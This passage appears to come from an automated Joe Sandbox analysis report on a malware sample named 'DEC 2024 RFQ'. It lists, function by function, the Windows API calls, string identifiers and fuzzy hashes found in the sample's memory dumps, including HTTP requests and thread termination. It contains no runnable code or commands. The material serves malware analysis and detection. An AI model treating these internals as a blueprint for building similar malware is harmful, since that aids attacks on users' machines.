                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 839392675-0
                                                                                                                      • Opcode ID: ac5f52cd29119e5f1f42dc6cf7b965761aec7786c612585cf8a05fa085f5cf44
                                                                                                                      • Instruction ID: 1dd2f14ca61d0db24dd2675e59e28a8a3126db21292add94a295dfe8e2e76933
                                                                                                                      • Opcode Fuzzy Hash: ac5f52cd29119e5f1f42dc6cf7b965761aec7786c612585cf8a05fa085f5cf44
                                                                                                                      • Instruction Fuzzy Hash: BCF01D32241959BBE7215BE2DC0DEBB7A7CEBC7B15F000169FA04D105196A91A0186B5
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00087243
                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00030EE4,?,?), ref: 00087254
                                                                                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00030EE4,?,?), ref: 00087261
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00030EE4,?,?), ref: 0008726E
                                                                                                                        • Part of subcall function 00086C35: CloseHandle.KERNEL32(00000000,?,0008727B,?,00030EE4,?,?), ref: 00086C3F
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00087281
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00030EE4,?,?), ref: 00087288
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3495660284-0
                                                                                                                      • Opcode ID: 3361136b0b8984b37d718b4eb995742bc6095102d80ce8c96a60db01973490a0
                                                                                                                      • Instruction ID: 4145441ffa3eb3126cb7a178af19dbae3ae851949107653fc58be2e51cf8cefa
                                                                                                                      • Opcode Fuzzy Hash: 3361136b0b8984b37d718b4eb995742bc6095102d80ce8c96a60db01973490a0
                                                                                                                      • Instruction Fuzzy Hash: 23F05E36540A13EBE7A22BA4ED4CAFA7769FF46702B100531F543910A4DB7A5801CB50
                                                                                                                      APIs
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0007899D
                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 000789A9
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000789B2
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000789BA
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 000789C3
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000789CA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 146765662-0
                                                                                                                      • Opcode ID: 7813bd57702af6500194af6e85f693904436c2f7b6635021c663f5c3917fab50
                                                                                                                      • Instruction ID: 9bce13c2dfee74042a0bc12fb3025c666e75b57f81c858b2de37678767bbda8f
                                                                                                                      • Opcode Fuzzy Hash: 7813bd57702af6500194af6e85f693904436c2f7b6635021c663f5c3917fab50
                                                                                                                      • Instruction Fuzzy Hash: 98E05276104906FFEB012FE5EC0C96ABB69FB8A762B508631F219C1470CB3A9461DB50
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00098613
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00098722
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0009889A
                                                                                                                        • Part of subcall function 00087562: VariantInit.OLEAUT32(00000000), ref: 000875A2
                                                                                                                        • Part of subcall function 00087562: VariantCopy.OLEAUT32(00000000,?), ref: 000875AB
                                                                                                                        • Part of subcall function 00087562: VariantClear.OLEAUT32(00000000), ref: 000875B7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                      • API String ID: 4237274167-1221869570
                                                                                                                      • Opcode ID: 25b55cc989b5ec1df98b43ee2c8c3ce0e79dc7efd42c19935f3fb2f6054eee32
                                                                                                                      • Instruction ID: ef23781741528de16e141877cc6e0f1c2e1931381ae839dda698e383e3f83b03
                                                                                                                      • Opcode Fuzzy Hash: 25b55cc989b5ec1df98b43ee2c8c3ce0e79dc7efd42c19935f3fb2f6054eee32
                                                                                                                      • Instruction Fuzzy Hash: CA917F716083019FCB10DF64C48499BB7E4EF8A714F14896EF89A9B362DB31E945CB52
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0003FC86: _wcscpy.LIBCMT ref: 0003FCA9
                                                                                                                      • _memset.LIBCMT ref: 00082B87
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00082BB6
                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00082C69
                                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00082C97
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 4152858687-4108050209
                                                                                                                      • Opcode ID: 74ee54b63bf3eeb3b2cac87a6b7ec476c77436897743e4a43b000e0f2c046d25
                                                                                                                      • Instruction ID: eceaa1e9cfe1aabd7da663c9abd3af4cba8297ab0705beea9580f435e3e953aa
                                                                                                                      • Opcode Fuzzy Hash: 74ee54b63bf3eeb3b2cac87a6b7ec476c77436897743e4a43b000e0f2c046d25
                                                                                                                      • Instruction Fuzzy Hash: 0951CBB16093019ED7A5EE28D845ABFB7E8FF89310F040A2DF8D5E6291DB74CC048792
                                                                                                                      APIs
                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0007D5D4
                                                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0007D60A
                                                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0007D61B
                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0007D69D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                      • String ID: DllGetClassObject
                                                                                                                      • API String ID: 753597075-1075368562
                                                                                                                      • Opcode ID: e19c3dd14c439424925803bbf66ce1ee3808f11ea12d19cb61dada19116165cb
                                                                                                                      • Instruction ID: abe641ad3fc41349b9ca6dc1aa06c1cf56917acc27122612f3f66288ffc6f4cd
                                                                                                                      • Opcode Fuzzy Hash: e19c3dd14c439424925803bbf66ce1ee3808f11ea12d19cb61dada19116165cb
                                                                                                                      • Instruction Fuzzy Hash: 84418FB1A00205EFDB15DF54C884A9A7BB9EF44310F15C1AEED0D9F206D7B9D940CBA4
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 000827C0
                                                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 000827DC
                                                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00082822
                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,000E5890,00000000), ref: 0008286B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1173514356-4108050209
                                                                                                                      • Opcode ID: acb8fdddb7055a547abc8d827245e93334d52d85eafc87d57912764f2a3c537c
                                                                                                                      • Instruction ID: 4e69830131555922016aed6c55939c41063725c6b40133b75fba501094221655
                                                                                                                      • Opcode Fuzzy Hash: acb8fdddb7055a547abc8d827245e93334d52d85eafc87d57912764f2a3c537c
                                                                                                                      • Instruction Fuzzy Hash: C9418E70605341EFDB24EF24C844B6ABBE8FF85324F14492EF9A597292DB30A905CB52
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0009D7C5
                                                                                                                        • Part of subcall function 0002784B: _memmove.LIBCMT ref: 00027899
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharLower_memmove
                                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                                      • API String ID: 3425801089-567219261
                                                                                                                      • Opcode ID: 1388fa4558b26ad392a376b0076e5fd5d9a29935f92fe8cd8af9c7c8b7858f55
                                                                                                                      • Instruction ID: e9080cf8766f9a68af6fbc5db21b850cf21024e6383d9823cc56abdc86109fe0
                                                                                                                      • Opcode Fuzzy Hash: 1388fa4558b26ad392a376b0076e5fd5d9a29935f92fe8cd8af9c7c8b7858f55
                                                                                                                      • Instruction Fuzzy Hash: D3318D7194461AABCF00EF54CC519FEB3B5FF05320B10862AE869A77D2DB71A905CB90
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                        • Part of subcall function 0007AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0007AABC
                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00078F14
                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00078F27
                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00078F57
                                                                                                                        • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$_memmove$ClassName
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 365058703-1403004172
                                                                                                                      • Opcode ID: 48b697fe9810eb47aa63b26792c1c37e5332fd0c4fbc003a6314ac03f21178b6
                                                                                                                      • Instruction ID: de1b749e2c1bc05896cf10206044f748d25ddb99c32881edbd1a11ea4f3f90c2
                                                                                                                      • Opcode Fuzzy Hash: 48b697fe9810eb47aa63b26792c1c37e5332fd0c4fbc003a6314ac03f21178b6
                                                                                                                      • Instruction Fuzzy Hash: 3621F271E40104BEDB14ABB09C49DFFB7A9DF06360B04C12AF429A72E2DF3958099764
                                                                                                                      APIs
                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0009184C
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00091872
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000918A2
                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 000918E9
                                                                                                                        • Part of subcall function 00092483: GetLastError.KERNEL32(?,?,00091817,00000000,00000000,00000001), ref: 00092498
                                                                                                                        • Part of subcall function 00092483: SetEvent.KERNEL32(?,?,00091817,00000000,00000000,00000001), ref: 000924AD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3113390036-3916222277
                                                                                                                      • Opcode ID: d5c42c6395359531146e71c8d921b510e9a5572ef103ec01a062e591f93308e6
                                                                                                                      • Instruction ID: cd14aa7b770580a96af921f05f365dc61300501c3ea1424b929fa24c636e1da7
                                                                                                                      • Opcode Fuzzy Hash: d5c42c6395359531146e71c8d921b510e9a5572ef103ec01a062e591f93308e6
                                                                                                                      • Instruction Fuzzy Hash: 4321BEB5604209BFEB119BA0DC85EFF77EDEB49744F10412AF805A6280EA648D04B7A0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00021D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00021D73
                                                                                                                        • Part of subcall function 00021D35: GetStockObject.GDI32(00000011), ref: 00021D87
                                                                                                                        • Part of subcall function 00021D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00021D91
                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 000A6461
                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 000A6468
                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 000A647D
                                                                                                                      • DestroyWindow.USER32(?), ref: 000A6485
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                      • String ID: SysAnimate32
                                                                                                                      • API String ID: 4146253029-1011021900
                                                                                                                      • Opcode ID: d5675b93e7bb76b3632ee04013b2b361c11783e9cf7da1161a7580f3cf4c752d
                                                                                                                      • Instruction ID: e6cbdaabdafee42433e133b0c84981ed3623d846c7226e3fd21a0fa24f82143a
                                                                                                                      • Opcode Fuzzy Hash: d5675b93e7bb76b3632ee04013b2b361c11783e9cf7da1161a7580f3cf4c752d
                                                                                                                      • Instruction Fuzzy Hash: 4D21BB72200205ABEF104FE4DC80EBB37FDEB5A368F184629FA1097090C7369C41A760
                                                                                                                      APIs
                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00086DBC
                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00086DEF
                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00086E01
                                                                                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00086E3B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHandle$FilePipe
                                                                                                                      • String ID: nul
                                                                                                                      • API String ID: 4209266947-2873401336
                                                                                                                      • Opcode ID: 52cca21dfbc3693f8d0478200ac716de3ebe4f6cb66d878245d84d2168d8de59
                                                                                                                      • Instruction ID: f4f986f047031842eae4ada80e51dc534fd6bf5f669f680bb8db2d11a2c5d3f5
                                                                                                                      • Opcode Fuzzy Hash: 52cca21dfbc3693f8d0478200ac716de3ebe4f6cb66d878245d84d2168d8de59
                                                                                                                      • Instruction Fuzzy Hash: 73218174A0030AABDB20AF69DC04BAA77E8FF45720F214619FDE1D72D0DB729950CB50
                                                                                                                      APIs
                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00086E89
                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00086EBB
                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00086ECC
                                                                                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00086F06
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHandle$FilePipe
                                                                                                                      • String ID: nul
                                                                                                                      • API String ID: 4209266947-2873401336
                                                                                                                      • Opcode ID: 50c673020e21fc721b0b2606e8861ffa6a8716f67bbc7b0ad68c1b70a9a63d53
                                                                                                                      • Instruction ID: c933aa16e5a2f6fd09176b2de9f9fd9946c7cbb6783df91fe4b959a74c4781fe
                                                                                                                      • Opcode Fuzzy Hash: 50c673020e21fc721b0b2606e8861ffa6a8716f67bbc7b0ad68c1b70a9a63d53
                                                                                                                      • Instruction Fuzzy Hash: 2C2183796003069BDB30AF69DC04AAA77E8FF55720F214A19FDE1D72D0DB72A851CB60
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0008AC54
                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0008ACA8
                                                                                                                      • __swprintf.LIBCMT ref: 0008ACC1
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,000AF910), ref: 0008ACFF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                      • String ID: %lu
                                                                                                                      • API String ID: 3164766367-685833217
                                                                                                                      • Opcode ID: 7559134ff3227ba441995f26486f91890e421db3e073d2f80aa7c78e07d98d96
                                                                                                                      • Instruction ID: 0f477f0658c4b79bcc1ecd7054ae0582f97f4e10ffb74282d0f0dbc669a5f088
                                                                                                                      • Opcode Fuzzy Hash: 7559134ff3227ba441995f26486f91890e421db3e073d2f80aa7c78e07d98d96
                                                                                                                      • Instruction Fuzzy Hash: 8E214171A00209AFDB10EFA5D945EEE7BB8FF49714B004069F9099B252DB71EA41CB61
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00081B19
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                      • API String ID: 3964851224-769500911
                                                                                                                      • Opcode ID: 0dcfc83b6d834fe137906099dceb0168992b43a3eb0b9ea09a685b03e2abab37
                                                                                                                      • Instruction ID: 0f7eafb6905cafcf19aaa704861d86411cbf0d0cf3cae02a0a1c94a6159ba23f
                                                                                                                      • Opcode Fuzzy Hash: 0dcfc83b6d834fe137906099dceb0168992b43a3eb0b9ea09a685b03e2abab37
                                                                                                                      • Instruction Fuzzy Hash: 3D1180B09402199FCF40EFA4E8518FEB7B8FF26304F1084A9D858A7392EB325D06CB54
                                                                                                                      APIs
